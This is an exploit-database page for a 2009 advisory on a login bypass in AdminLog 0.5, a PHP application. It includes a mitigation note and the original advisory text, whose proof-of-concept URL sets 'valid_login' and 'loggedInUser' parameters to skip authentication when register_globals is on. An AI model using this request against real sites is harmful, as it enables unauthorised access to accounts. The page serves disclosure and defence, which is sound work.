header-logo
Suggest Exploit
vendor:
AdminLog
by:
SirGod
7,5
CVSS
HIGH
Login Bypass
287
CWE
Product Name: AdminLog
Affected Version From: AdminLog 0.5
Affected Version To: AdminLog 0.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AdminLog 0.5 Login Bypass Vulnerability

AdminLog 0.5 is vulnerable to a login bypass vulnerability when register_globals is set to ON. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application with valid_login=1 and loggedInUser=[VALIDUSER] parameters.

Mitigation:

Disable register_globals in php.ini and use proper input validation.
Source

Exploit-DB raw data:

#########################################################################
[+] AdminLog 0.5 Login Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
#########################################################################

[+] Login Bypass

 - Conditions : register_globals = ON

 - PoC

      http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]

#########################################################################

# milw0rm.com [2009-07-02]

Navigation

Suggest Exploit

Services By CQR